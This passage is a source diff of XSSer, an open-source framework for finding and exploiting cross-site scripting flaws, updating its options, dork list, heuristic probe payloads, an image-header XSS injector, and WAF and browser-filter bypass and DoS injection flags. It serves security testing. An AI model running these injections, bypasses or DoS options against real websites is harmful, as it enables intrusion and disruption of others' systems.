-Copyright (c) 2011/2016 psy <epsylon@riseup.net>
+Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
 
 xsser is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free

core/fuzzing/dorks.txt

@@ -0,0 +1,40 @@
+?id=
+?url=
+?search=
+?query=
+?cmd=
+?z=
+?q=
+?l=
+?r=
+?searchstring=
+?keyword=­
+?file=
+?years=
+?txt=
+?tag=
+?max=
+?from=
+?author=
+?pass=
+?feedback­=
+?mail=
+?cat=
+?vote=
+?sid=
+?msg=
+?category=
+?PID= 
+?search_keywords=
+?mid=
+?catid=
+?pid=
+?order_direction=
+?course_id=
+?session=
+?sfunction=
+?search_keywords=
+?site=
+?errmsg=
+?decl_id=
+?num=

xsser/core/fuzzing/heuristic.py

@@ -2,11 +2,9 @@
 # -*- coding: utf-8 -*-"
 # vim: set expandtab tabstop=4 shiftwidth=4:
 """
-$Id$
+This file is part of the XSSer project, https://xsser.03c8.net
 
-This file is part of the xsser project, http://xsser.03c8.net
-
-Copyright (c) 2011/2016 psy <epsylon@riseup.net>
+Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
 
 xsser is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
@@ -26,79 +24,50 @@ Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 ## Happy Cross Hacking! ;)
 
 heuristic_test = [
-		# ascii
 		{ 'payload' : """XSS\\XSS""",
-                  'browser' : """[Heuristic test]""" },
-
+          'browser' : """[Heuristic test]""" },
 		{ 'payload' : """XSS/XSS""",
-		  'browser' : """[Heuristic test]""" },
-				
+		  'browser' : """[Heuristic test]""" },			
 		{ 'payload' : """XSS>XSS""",
-                  'browser' : """[Heuristic test]""" },
-
+          'browser' : """[Heuristic test]""" },
 		{ 'payload' : """XSS<XSS""",
 		  'browser' : """[Heuristic test]""" },
-
 		{ 'payload' : """XSS;XSS""",
-                  'browser' : """[Heuristic test]""" },
-
+          'browser' : """[Heuristic test]""" },
 		{ 'payload' : """XSS'XSS""",
-                  'browser' : """[Heuristic test]""" },
-
+          'browser' : """[Heuristic test]""" },
 		{ 'payload' : '''XSS"XSS''',
-                  'browser' : """[Heuristic test]""" },
-
+          'browser' : """[Heuristic test]""" },
 		{ 'payload' : """XSS=XSS""",
-                  'browser' : """[Heuristic test]""" },
-                # hex/une
+          'browser' : """[Heuristic test]""" },
 		{ 'payload' : """XSS%5CXSS""",
 		  'browser' : """[Heuristic test]""" },
-                # / is the same on Unicode than in ASCII
-                #{ 'payload' : """XSS/XSS""",
-                #  'browser' : """[Heuristic test]""" },
-
 		{ 'payload' : """XSS%3EXSS""",
 		  'browser' : """[Heuristic test]""" },
-
 		{ 'payload' : """XSS%3CXSS""",
 		  'browser' : """[Heuristic test]""" },
-		
 		{ 'payload' : """XSS%3BXSS""",
 		  'browser' : """[Heuristic test]""" },
-
 		{ 'payload' : """XSS%27XSS""",
 		  'browser' : """[Heuristic test]""" },
-
 		{ 'payload' : '''XSS%22XSS''',
 		  'browser' : """[Heuristic test]""" },
-
 		{ 'payload' : """XSS%3DXSS""",
 		  'browser' : """[Heuristic test]""" },
-                # dec
 		{ 'payload' : """XSS&#92XSS""",
 		  'browser' : """[Heuristic test]""" },
-		
 		{ 'payload' : """XSS&#47XSS""",
 		  'browser' : """[Heuristic test]""" },
-
 		{ 'payload' : """XSS&#62XSS""",
 		  'browser' : """[Heuristic test]""" },
-
 		{ 'payload' : """XSS&#60XSS""",
 		  'browser' : """[Heuristic test]""" },
-
 		{ 'payload' : """XSS&#59XSS""",
 		  'browser' : """[Heuristic test]""" },
-
 		{ 'payload' : """XSS&#39XSS""",
 		  'browser' : """[Heuristic test]""" },
-
 		{ 'payload' : '''XSS&#34XSS''',
-                  'browser' : """[Heuristic test]""" },
-
+          'browser' : """[Heuristic test]""" },
 		{ 'payload' : """XSS&#61XSS""",
 		  'browser' : """[Heuristic test]""" }
-
 		]
-
-

xsser/core/globalmap.py

@@ -2,11 +2,9 @@
 # -*- coding: utf-8 -*-"
 # vim: set expandtab tabstop=4 shiftwidth=4:
 """
-$Id$
+This file is part of the XSSer project, https://xsser.03c8.net
 
-This file is part of the xsser project, http://xsser.03c8.net
-
-Copyright (c) 2011/2016 psy <epsylon@riseup.net>
+Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
 
 xsser is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free

xsser/core/gtkcontroller.py

@@ -2,9 +2,9 @@
 # -*- coding: utf-8 -*-"
 # vim: set expandtab tabstop=4 shiftwidth=4:
 """
-This file is part of the xsser project, https://xsser.03c8.net
+This file is part of the XSSer project, https://xsser.03c8.net
 
-Copyright (c) 2011/2016/2018 psy <epsylon@riseup.net>
+Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
 
 xsser is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
@@ -268,7 +268,7 @@ class Controller(XSSerReporter):
         step4_options_w = self.wTree.get_object('combobox_step4')
         step5_options_w = self.wTree.get_object('combobox_step5')
         # ui comboboxes content
-        dorker_options = [ 'yahoo', 'bing']
+        dorker_options = [ 'duck', 'startpage', 'yahoo', 'bing']
         crawlerdeep_options = ['1', '2', '3', '4', '5']
         checkmethod_options = ['GET', 'POST']
         connect_geomap = ['OFF', 'ON']
@@ -347,12 +347,12 @@ class Controller(XSSerReporter):
         Callback called when the window is destroyed (close button clicked)
         """
         if self._flying:
-            print("Exiting xsser... please wait until all mosquitoes return to mothership!")
+            print("[Info] Exiting... please wait until all mosquitoes return to mothership!\n")
             self._quitting = True
             self.on_stop_attack()
             self.do_quit()
         else:
-            print("\nbyezZZZzzzz!\n")
+            print("byezZZZzzzz!\n")
             self.do_quit()
 
     def do_quit(self):
@@ -1784,6 +1784,30 @@ class Controller(XSSerReporter):
             pass
         else:
             command.append("--Quickdefense")
+        # get Technique: Firefox
+        target_entry = self.wTree.get_object('firefox')
+        if target_entry.get_active() == False:
+            pass
+        else:
+            command.append("--Firefox")
+        # get Technique: Chrome
+        target_entry = self.wTree.get_object('chrome')
+        if target_entry.get_active() == False:
+            pass
+        else:
+            command.append("--Chrome")
+        # get Technique: IExplorer
+        target_entry = self.wTree.get_object('iexplorer')
+        if target_entry.get_active() == False:
+            pass
+        else:
+            command.append("--Iexplorer")
+        # get Technique: Opera
+        target_entry = self.wTree.get_object('opera')
+        if target_entry.get_active() == False:
+            pass
+        else:
+            command.append("--Opera")
         # get Final code: Normal Payload
         target_entry = self.wTree.get_object('normalfinal')
         if target_entry.get_active() == False:

xsser/core/imagexss.py

@@ -2,11 +2,9 @@
 # -*- coding: utf-8 -*-"
 # vim: set expandtab tabstop=4 shiftwidth=4:
 """
-$Id$
+This file is part of the XSSer project, https://xsser.03c8.net
 
-This file is part of the xsser project, http://xsser.03c8.net
-
-Copyright (c) 2011/2016 psy <epsylon@riseup.net>
+Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
 
 xsser is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
@@ -34,16 +32,13 @@ class ImageInjections(object):
         """
         # check user image name input valid extensions
         root, ext = os.path.splitext(filename)
-        
-	# create file and inject code
+    	# create file and inject code
         if ext.lower() in [".png", ".jpg", ".gif", ".bmp"]:
             f = open(filename, 'wb')
-						                
             # check user payload input
             user_payload = payload
             if not user_payload:
                 user_payload = "<script>alert('XSS')</script>"
-	
             # inject each XSS specific code     
             if ext.lower() == ".png":
                 content = '‰PNG' + user_payload
@@ -53,14 +48,12 @@ class ImageInjections(object):
                 content = 'ÿØÿà JFIF' + user_payload
             elif ext.lower() == ".bmp":
                 content = 'BMFÖ' + user_payload
-
             # write and close
             f.write(content)
             f.close()
-
-            image_results = "\nCode: "+ content + "\nFile: ", root + ext
+            image_results = "\n[Info] XSS Vector: \n\n "+ content + "\n\n[Info] File: \n\n ", root + ext + "\n"
         else:
-            image_results = "\nPlease select a supported extension = .PNG, .GIF, .JPG or .BMP"
+            image_results = "\n[Error] Supported extensions = .PNG, .GIF, .JPG or .BMP\n"
         return image_results
 
 if __name__ == '__main__':

xsser/core/mozchecker.py

@@ -2,11 +2,9 @@
 # -*- coding: utf-8 -*-"
 # vim: set expandtab tabstop=4 shiftwidth=4:
 """
-$Id$
+This file is part of the XSSer project, https://xsser.03c8.net
 
-This file is part of the xsser project, http://xsser.03c8.net
-
-Copyright (c) 2011/2016 psy <epsylon@riseup.net>
+Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
 
 xsser is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free

xsser/core/options.py

@@ -2,11 +2,9 @@
 # -*- coding: utf-8 -*-"
 # vim: set expandtab tabstop=4 shiftwidth=4:
 """
-$Id$
+This file is part of the XSSer project, https://xsser.03c8.net
 
-This file is part of the xsser project, https://xsser.03c8.net
-
-Copyright (c) 2011/2018 psy <epsylon@riseup.net>
+Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
 
 xsser is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
@@ -32,7 +30,7 @@ class XSSerOptions(optparse.OptionParser):
         optparse.OptionParser.__init__(self, 
                            description='Cross Site "Scripter" is an automatic -framework- to detect, exploit and\nreport XSS vulnerabilities in web-based applications.',
                            prog='XSSer.py',
-			   version='\nXSSer v1.7b: "ZiKA-47 Swarm!" - 2011/2018 - (GPLv3.0) -> by psy\n',
+			   version='\nXSSer v1.8[1]: "The Hive!" - (https://xsser.03c8.net) - 2010/2019 -> by psy\n',
                            usage= '\n\nxsser [OPTIONS] [--all <url> |-u <url> |-i <file> |-d <dork> (options)|-l ] [-g <get> |-p <post> |-c <crawl> (options)]\n[Request(s)] [Checker(s)] [Vector(s)] [Anti-antiXSS/IDS] [Bypasser(s)] [Technique(s)] [Final Injection(s)] [Reporting] {Miscellaneous}')
         self.set_defaults(verbose=False, threads=5, retries=1, delay=0, timeout=30,
                           silent=False)
@@ -69,55 +67,65 @@ class XSSerOptions(optparse.OptionParser):
 
         group3 = optparse.OptionGroup(self, "*Select type of HTTP/HTTPS Connection(s)*",
         "These options can be used to specify which parameter(s) we want to use as payload(s). Set 'XSS' as keyword on the place(s) that you want to inject:")
-        group3.add_option("-g", action="store", dest="getdata", help="Send payload using GET (ex: '/menu.php?id=3&q=XSS')")
+        group3.add_option("-g", action="store", dest="getdata", help="Send payload using GET (ex: '/menu.php?id=XSS')")
         group3.add_option("-p", action="store", dest="postdata", help="Send payload using POST (ex: 'foo=1&bar=XSS')")
         group3.add_option("-c", action="store", dest="crawling", help="Number of urls to crawl on target(s): 1-99999")
-        group3.add_option("--Cw", action="store", dest="crawler_width", help="Deeping level of crawler: 1-5 (default 3)")
-        group3.add_option("--Cl", action="store_true", dest="crawler_local", help="Crawl only local target(s) urls (default TRUE)") 
+        group3.add_option("--Cw", action="store", dest="crawler_width", help="Deeping level of crawler: 1-5 (default: 2)")
+        group3.add_option("--Cl", action="store_true", dest="crawler_local", help="Crawl only local target(s) urls (default: FALSE)") 
         self.add_option_group(group3)
 
         group4 = optparse.OptionGroup(self, "*Configure Request(s)*",
-        "These options can be used to specify how to connect to the target(s) payload(s). You can choose multiple:") 
+        "These options can be used to specify how to connect to the target(s) payload(s). You can choose multiple:")
+        group4.add_option("--head", action="store_true", dest="nohead", help="Send a HEAD request before start a test")
         group4.add_option("--cookie", action="store", dest="cookie", help="Change your HTTP Cookie header")
         group4.add_option("--drop-cookie", action="store_true", dest="dropcookie", help="Ignore Set-Cookie header from response")
-        group4.add_option("--user-agent", action="store", dest="agent", help="Change your HTTP User-Agent header (default SPOOFED)")
-        group4.add_option("--referer", action="store", dest="referer", help="Use another HTTP Referer header (default NONE)")
+        group4.add_option("--user-agent", action="store", dest="agent", help="Change your HTTP User-Agent header (default: SPOOFED)")
+        group4.add_option("--referer", action="store", dest="referer", help="Use another HTTP Referer header (default: NONE)")
         group4.add_option("--xforw", action="store_true", dest="xforw", help="Set your HTTP X-Forwarded-For with random IP values")
         group4.add_option("--xclient", action="store_true", dest="xclient", help="Set your HTTP X-Client-IP with random IP values")
         group4.add_option("--headers", action="store", dest="headers", help="Extra HTTP headers newline separated")
         group4.add_option("--auth-type", action="store", dest="atype", help="HTTP Authentication type (Basic, Digest, GSS or NTLM)") 
         group4.add_option("--auth-cred", action="store", dest="acred", help="HTTP Authentication credentials (name:password)")
-        #group4.add_option("--auth-cert", action="store", dest="acert", help="HTTP Authentication certificate (key_file,cert_file)") 
+        #group4.add_option("--auth-cert", action="store", dest="acert", help="HTTP Authentication certificate (key_file,cert_file)")
+        group4.add_option("--check-tor", action="store_true", dest="checktor", help="Check to see if Tor is used properly")
         group4.add_option("--proxy", action="store", dest="proxy", help="Use proxy server (tor: http://localhost:8118)")
         group4.add_option("--ignore-proxy", action="store_true", dest="ignoreproxy", help="Ignore system default HTTP proxy")
-        group4.add_option("--timeout", action="store", dest="timeout", type="int", help="Select your timeout (default 30)")
-        group4.add_option("--retries", action="store", dest="retries", type="int", help="Retries when the connection timeouts (default 1)")
-        group4.add_option("--threads", action="store", dest="threads", type="int", help="Maximum number of concurrent HTTP requests (default 5)") 
-        group4.add_option("--delay", action="store", dest="delay", type="int", help="Delay in seconds between each HTTP request (default 0)")
+        group4.add_option("--timeout", action="store", dest="timeout", type="int", help="Select your timeout (default: 30)")
+        group4.add_option("--retries", action="store", dest="retries", type="int", help="Retries when connection timeout (default: 1)")
+        group4.add_option("--threads", action="store", dest="threads", type="int", help="Maximum number of concurrent requests (default: 5)") 
+        group4.add_option("--delay", action="store", dest="delay", type="int", help="Delay in seconds between each request (default: 0)")
         group4.add_option("--tcp-nodelay", action="store_true", dest="tcp_nodelay", help="Use the TCP_NODELAY option")
         group4.add_option("--follow-redirects", action="store_true", dest="followred", help="Follow server redirection responses (302)")
-        group4.add_option("--follow-limit", action="store", dest="fli", type="int", help="Set limit for redirection requests (default 50)")
+        group4.add_option("--follow-limit", action="store", dest="fli", type="int", help="Set limit for redirection requests (default: 50)")
         self.add_option_group(group4)
 
         group5 = optparse.OptionGroup(self, "*Checker Systems*",
         "These options are useful to know if your target is using filters against XSS attacks:")
-        group5.add_option("--hash", action="store_true", dest="hash", help="send a hash to check if target is repeating content")
-        group5.add_option("--heuristic", action="store_true", dest="heuristic", help="discover parameters filtered by using heuristics")
-        group5.add_option("--discode", action="store", dest="discode", help="set code on reply to discard an injection")
-        group5.add_option("--checkaturl", action="store", dest="alt", help="check reply using: alternative url -> Blind XSS")
-        group5.add_option("--checkmethod", action="store", dest="altm", help="check reply using: GET or POST (default: GET)")
-        group5.add_option("--checkatdata", action="store", dest="ald", help="check reply using: alternative payload") 
-        group5.add_option("--reverse-check", action="store_true", dest="reversecheck", help="establish a reverse connection from target to XSSer to certify that is 100% vulnerable (recommended!)")
+        group5.add_option("--hash", action="store_true", dest="hash", help="Send a hash to check if target is repeating content")
+        group5.add_option("--heuristic", action="store_true", dest="heuristic", help="Discover parameters filtered by using heuristics")
+        group5.add_option("--discode", action="store", dest="discode", help="Set code on reply to discard an injection")
+        group5.add_option("--checkaturl", action="store", dest="alt", help="Check reply using: <alternative url> [aka BLIND-XSS]")
+        group5.add_option("--checkmethod", action="store", dest="altm", help="Check reply using: GET or POST (default: GET)")
+        group5.add_option("--checkatdata", action="store", dest="ald", help="Check reply using: <alternative payload>") 
+        group5.add_option("--reverse-check", action="store_true", dest="reversecheck", help="Establish a reverse connection from target to XSSer")
+        group5.add_option("--reverse-open", action="store_true", dest="reverseopen", help="Open a web browser when a reverse check is established")
         self.add_option_group(group5)
 
         group6 = optparse.OptionGroup(self, "*Select Vector(s)*",
         "These options can be used to specify injection(s) code. Important if you don't want to inject a common XSS vector used by default. Choose only one option:")
-        group6.add_option("--payload", action="store", dest="script", help="OWN  - Inject your own code")
-        group6.add_option("--auto", action="store_true", dest="fuzz", help="AUTO - Inject a list of vectors provided by XSSer")
+        group6.add_option("--payload", action="store", dest="script", help="OWN   - Inject your own code")
+        group6.add_option("--auto", action="store_true", dest="fuzz", help="AUTO  - Inject a list of vectors provided by XSSer")
         self.add_option_group(group6)
 
+        group14 = optparse.OptionGroup(self, "*Select Payload(s)*",
+        "These options can be used to set the list of vectors provided by XSSer. Choose only if required:")
+        group14.add_option("--auto-set", action="store", dest="fzz_num", help="ASET  - Limit of vectors to inject (default: "+str(self.vectors_fuzz)+")")
+        group14.add_option("--auto-info", action="store_true", dest="fzz_info", help="AINFO - Select ONLY vectors with INFO (defaul: FALSE)")
+        group14.add_option("--auto-random", action="store_true", dest="fzz_rand", help="ARAND - Set random to order (default: FALSE)")
+        self.add_option_group(group14)
+
         group13 = optparse.OptionGroup(self, "*Anti-antiXSS Firewall rules*",
-        "These options can be used to try to bypass specific WAF/IDS products. Choose only if required:")
+        "These options can be used to try to bypass specific WAF/IDS products and some anti-XSS browser filters. Choose only if required:")
         group13.add_option("--Phpids0.6.5", action="store_true", dest="phpids065", help="PHPIDS (0.6.5) [ALL]")
         group13.add_option("--Phpids0.7", action="store_true", dest="phpids070", help="PHPIDS (0.7) [ALL]")
         group13.add_option("--Imperva", action="store_true", dest="imperva", help="Imperva Incapsula [ALL]")
@@ -126,6 +134,10 @@ class XSSerOptions(optparse.OptionParser):
         group13.add_option("--Barracuda", action="store_true", dest="barracuda", help="Barracuda WAF [ALL]")
         group13.add_option("--Modsec", action="store_true", dest="modsec", help="Mod-Security [ALL]")
         group13.add_option("--Quickdefense", action="store_true", dest="quickdefense", help="QuickDefense [Chrome]")
+        group13.add_option("--Firefox", action="store_true", dest="firefox", help="Firefox 12 [& below]")
+        group13.add_option("--Chrome", action="store_true", dest="chrome", help="Chrome 19 & Firefox 12 [& below]")
+        group13.add_option("--Opera", action="store_true", dest="opera", help="Opera 10.5 [& below]")
+        group13.add_option("--Iexplorer", action="store_true", dest="iexplorer", help="IExplorer 9 & Firefox 12 [& below]")
         self.add_option_group(group13)
        
         group7 = optparse.OptionGroup(self, "*Select Bypasser(s)*",
@@ -142,60 +154,59 @@ class XSSerOptions(optparse.OptionParser):
         self.add_option_group(group7)
 
         group8 = optparse.OptionGroup(self, "*Special Technique(s)*",
-        "These options can be used to inject code using different XSS techniques. You can choose multiple:")
+        "These options can be used to inject code using different XSS techniques and fuzzing vectors. You can choose multiple:")
         group8.add_option("--Coo", action="store_true", dest="coo", help="COO - Cross Site Scripting Cookie injection")
         group8.add_option("--Xsa", action="store_true", dest="xsa", help="XSA - Cross Site Agent Scripting")
         group8.add_option("--Xsr", action="store_true", dest="xsr", help="XSR - Cross Site Referer Scripting")
         group8.add_option("--Dcp", action="store_true", dest="dcp", help="DCP - Data Control Protocol injections")
         group8.add_option("--Dom", action="store_true", dest="dom", help="DOM - Document Object Model injections")
         group8.add_option("--Ind", action="store_true", dest="inducedcode", help="IND - HTTP Response Splitting Induced code")
-        group8.add_option("--Anchor", action="store_true", dest="anchor", help="ANC - Use Anchor Stealth payloader (DOM shadows!)")
         self.add_option_group(group8)
 
         group9 = optparse.OptionGroup(self, "*Select Final injection(s)*",
         "These options can be used to specify the final code to inject on vulnerable target(s). Important if you want to exploit 'on-the-wild' the vulnerabilities found. Choose only one option:")
         group9.add_option("--Fp", action="store", dest="finalpayload", help="OWN    - Exploit your own code")
         group9.add_option("--Fr", action="store", dest="finalremote", help="REMOTE - Exploit a script -remotely-")
-        group9.add_option("--Doss", action="store_true", dest="doss", help="DOSs   - XSS (server) Denial of Service")
-        group9.add_option("--Dos", action="store_true", dest="dos", help="DOS    - XSS (client) Denial of Service")
-        group9.add_option("--B64", action="store_true", dest="b64", help="B64    - Base64 code encoding in META tag (rfc2397)")
         self.add_option_group(group9)
         
         group10 = optparse.OptionGroup(self, "*Special Final injection(s)*",
-        "These options can be used to execute some 'special' injection(s) on vulnerable target(s). You can select multiple and combine them with your final code (except with DCP code):")
-        group10.add_option("--Onm", action="store_true", dest="onm", help="ONM - Use onMouseMove() event")
-        group10.add_option("--Ifr", action="store_true", dest="ifr", help="IFR - Use <iframe> source tag")
+        "These options can be used to execute some 'special' injection(s) on vulnerable target(s). You can select multiple and combine them with your final code (except with DCP exploits):")
+        group10.add_option("--Anchor", action="store_true", dest="anchor", help="ANC  - Use 'Anchor Stealth' payloader (DOM shadows!)")
+        group10.add_option("--B64", action="store_true", dest="b64", help="B64  - Base64 code encoding in META tag (rfc2397)")
+        group10.add_option("--Onm", action="store_true", dest="onm", help="ONM  - Use onMouseMove() event")
+        group10.add_option("--Ifr", action="store_true", dest="ifr", help="IFR  - Use <iframe> source tag")
+        group10.add_option("--Dos", action="store_true", dest="dos", help="DOS  - XSS (client) Denial of Service")
+        group10.add_option("--Doss", action="store_true", dest="doss", help="DOSs - XSS (server) Denial of Service")
         self.add_option_group(group10)
 
         group11 = optparse.OptionGroup(self, "*Reporting*")
-        group11.add_option("--save", action="store_true", dest="fileoutput", help="export to file (XSSreport.raw)")
-        group11.add_option("--xml", action="store", dest="filexml", help="export to XML (--xml file.xml)")
+        group11.add_option("--save", action="store_true", dest="fileoutput", help="Export to file (XSSreport.raw)")
+        group11.add_option("--xml", action="store", dest="filexml", help="Export to XML (--xml file.xml)")
         self.add_option_group(group11)
 
         group12 = optparse.OptionGroup(self, "*Miscellaneous*")
-        group12.add_option("--silent", action="store_true", dest="silent", help="inhibit console output results")
-        group12.add_option("--no-head", action="store_true", dest="nohead", help="NOT send a HEAD request before start a test")
-        group12.add_option("--alive", action="store", dest="isalive", type="int", help="set limit of errors before check if target is alive")
-        group12.add_option("--update", action="store_true", dest="update", help="check for latest stable version")
+        group12.add_option("--silent", action="store_true", dest="silent", help="Inhibit console output results")
+        group12.add_option("--alive", action="store", dest="isalive", type="int", help="Set limit of errors before check if target is alive")
+        group12.add_option("--update", action="store_true", dest="update", help="Check for latest stable version")
         self.add_option_group(group12)
 
     def get_options(self, user_args=None):
         (options, args) = self.parse_args(user_args)
-        if (not options.url and not options.readfile and not options.dork and not options.dork_file and not options.imx and not options.flash and not options.update and not options.xsser_gtk and not options.wizard and not options.xst and not options.target):
+        if (not options.url and not options.readfile and not options.dork and not options.dork_file and not options.imx and not options.flash and not options.update and not options.xsser_gtk and not options.wizard and not options.xst and not options.target and not options.checktor):
             print "\n", '='*75
             print self.version
             print "-----------", "\n"
             print self.description, "\n"
             print '='*75
             print ""
-            print "                                       \\ \\                           %"
-            print "Project site:","                          \\ \\     LulZzzz!           %  "
-            print "http://xsser.03c8.net                 %% \\_\\                      %   "
-            print "                                      \/ ( \033[1;31m@\033[1;m.\033[1;31m@\033[1;m)         Bbzzzzz!      %  "
-            print "                                       \== < ==                  %      "
-            print "Forum:                                    / \_      ==       %          "
-            print "irc.freenode.net -> #xsser              (')   \   *=====%             "
-            print "                                       /  /       ========              "
+            print "                                \\ \\   LulZzzz!    /\                          "
+            print "Project site:","                && \\ \\            /\())\          %  %        "
+            print "https://xsser.03c8.net       &&&& \\_\\          (())\\))  %   %        %       " 
+            print "                              \/ ( \033[1;31m@\033[1;m.\033[1;31m@\033[1;m)      * //\\//\\%                 %  %"
+            print "                              || == < ==   * * \\//))//)  BBzzzzz!              "
+            print "Forum:                        ||]~~/ \~~[ *    (())//))                         "
+            print "irc.freenode.net -> #xsser    ||   (')          \/())/                          "
+            print "                              ||  /  /            \/                            "
             print ""
             print '='*75
             print "Total vectors:", self.total_vectors + " = XSS: " + str(self.vectors_fuzz) + " + DCP: " + str(self.vectors_dcp) + " + DOM: " + str(self.vectors_dom) + " + HTTPsr: " + str(self.vectors_httpsr)

xsser/core/post/__init__.py

@@ -1,9 +1,7 @@
 """
-$Id$
+This file is part of the XSSer project, https://xsser.03c8.net
 
-This file is part of the xsser project, http://xsser.03c8.net
-
-Copyright (c) 2011/2016 psy <epsylon@riseup.net>
+Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
 
 xsser is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free

xsser/core/post/xml_exporter.py

@@ -2,11 +2,9 @@
 # -*- coding: utf-8 -*-"
 # vim: set expandtab tabstop=4 shiftwidth=4:
 """
-$Id$
+This file is part of the XSSer project, https://xsser.03c8.net
 
-This file is part of the xsser project, http://xsser.03c8.net
-
-Copyright (c) 2011/2016 psy <epsylon@riseup.net>
+Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
 
 xsser is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
@@ -31,8 +29,7 @@ class xml_reporting(object):
     def __init__(self, xsser):
         # initialize main XSSer
         self.instance = xsser
-
-	# some counters
+	    # some counters
         self.xsr_found = 0
         self.xsa_found = 0
         self.coo_found = 0
@@ -47,7 +44,6 @@ class xml_reporting(object):
         title.text = "XSSer Security Report: " + str(datetime.datetime.now())
         abstract = ET.SubElement(root, "abstract")
         total_injections = len(self.instance.hash_found) + len(self.instance.hash_notfound)
-
         if len(self.instance.hash_found) + len(self.instance.hash_notfound) == 0:
             pass 
         injections = ET.SubElement(abstract, "injections")
@@ -55,9 +51,7 @@ class xml_reporting(object):
         failed_inj = ET.SubElement(injections, "failed")
         success_inj = ET.SubElement(injections, "successful")
         accur_inj = ET.SubElement(injections, "accur")
-
         total_inj_i = len(self.instance.hash_found) + len(self.instance.hash_notfound)
-
         total_inj.text = str(total_inj_i)
         failed_inj.text = str(len(self.instance.hash_notfound))
         success_inj.text = str(len(self.instance.hash_found))
@@ -65,7 +59,6 @@ class xml_reporting(object):
             accur_inj.text = "%s %%" % (str((len(self.instance.hash_found) * 100) / total_inj_i), )
         except ZeroDivisionError:
             accur_inj.text = "0 %"
-
         if self.instance.options.statistics:
             stats = ET.SubElement(root, "stats")
             test_time = datetime.datetime.now() - self.instance.time
@@ -103,7 +96,7 @@ class xml_reporting(object):
         results = ET.SubElement(root, "results")
         for line in self.instance.hash_found:
             attack = ET.SubElement(results, "attack")
-            url_ = ET.SubElement(attack, "injection")
+            url_ = ET.SubElement(attack, "payload")
             url_.text = line[0]
             attack_url = self.instance.apply_postprocessing(line[0], line[1], line[2], line[3], line[4], line[5], line[6])
             if self.instance.options.onm or self.instance.options.ifr or self.instance.options.b64  or self.instance.options.dos or self.instance.options.doss or self.instance.options.finalremote or self.instance.options.finalpayload:
@@ -116,42 +109,42 @@ class xml_reporting(object):
                 if xsr_vulnerable_host[0]["payload"] == line[4] and xsr_vulnerable_host[0]["target"] == line[6] and self.xsr_found > 1:
                     pass
                 else:
-                    aurl.text = "Cross Site Referer Scripting!! " + str(line[6]) + "/"+str(line[4])
+                    aurl.text = "XSR Injection! " + str(line[6]) + "/"+str(line[4])
             elif line[2] == "xsa":
                 self.xsa_found = self.xsa_found +1
                 xsa_vulnerable_host = [{"payload":str(line[4]), "target":str(line[6])}]
                 if xsa_vulnerable_host[0]["payload"] == line[4] and xsa_vulnerable_host[0]["target"] == line[6] and self.xsa_found > 1:
                     pass
                 else:
-                    aurl.text = "Cross Site Agent Scripting!! " + str(line[6]) + "/"+str(line[4])
+                    aurl.text = "XSA Injection! " + str(line[6]) + "/"+str(line[4])
             elif line[2] == "coo":
                 self.coo_found = self.coo_found +1
                 coo_vulnerable_host = [{"payload":str(line[4]), "target":str(line[6])}]
                 if coo_vulnerable_host[0]["payload"] == line[4] and coo_vulnerable_host[0]["target"] == line[6] and self.coo_found > 1:
                     pass
                 else:
-                    aurl.text = "Cross Site Cookie Scripting!! " + str(line[6]) + "/"+str(line[4])
+                    aurl.text = "Cookie Injection! " + str(line[6]) + "/"+str(line[4])
             elif line[2] == "dcp":
                 self.dcp_found = self.dcp_found +1
                 dcp_vulnerable_host = [{"payload":str(line[4]), "target":str(line[6])}]
                 if dcp_vulnerable_host[0]["payload"] == line[4] and dcp_vulnerable_host[0]["target"] == line[6] and self.dcp_found > 1:
                     pass
                 else:
-                    aurl.text = "Data Control Protocol injections!! " + str(line[6]) + "/"+str(line[4])
+                    aurl.text = "DCP (Data Control Protocol) " + str(line[6]) + "/"+str(line[4])
             elif line[2] == "dom":
                 self.dom_found = self.dom_found +1
                 dom_vulnerable_host = [{"payload":str(line[4]), "target":str(line[6])}]
                 if dom_vulnerable_host[0]["payload"] == line[4] and dom_vulnerable_host[0]["target"] == line[6] and self.dom_found > 1:
                     pass
                 else:
-                    aurl.text = "Document Object Model injections!! " + str(line[6]) + "/"+str(line[4])
+                    aurl.text = "DOM (Document Object Model) " + str(line[6]) + "/"+str(line[4])
             elif line[2] == "ind":
                 self.ind_found = self.ind_found +1
                 ind_vulnerable_host = [{"payload":str(line[4]), "target":str(line[6])}]
                 if ind_vulnerable_host[0]["payload"] == line[4] and ind_vulnerable_host[0]["target"] == line[6] and self.ind_found > 1:
                     pass
                 else:
-                    aurl.text = "HTTP Response Splitting Induced code!! " + str(line[6]) + "/"+str(line[4])
+                    aurl.text = "HTTPrs (HTTP Response Splitting) " + str(line[6]) + "/"+str(line[4])
             else:
                 if aurl == None:
                     pass
@@ -160,14 +153,43 @@ class xml_reporting(object):
             if line[2] == "xsr" or line[2] == "xsa" or line[2] == "coo" or line[2] == "dcp" or line[2] == "dom" or line[2] == "ind":
                 pass
             else:
-                browsers = ET.SubElement(attack, "browsers")
+                browsers = ET.SubElement(attack, "vulnerable")
                 browsers.text = line[1]
-                method = ET.SubElement(attack, "method")
+                method = ET.SubElement(attack, "vector")
                 method.text = line[2]
-
         if not self.instance.hash_found:
-            msg = ET.SubElement(results, "message")
-            msg.text = "Failed injection(s): " +str(''.join([u[0] for u in self.instance.hash_notfound])) 
+            msg = ET.SubElement(results, "results")
+            msg.text = ""
+            for h in self.instance.hash_notfound:
+                if h[2] == 'heuristic':
+                    if not h[4]:
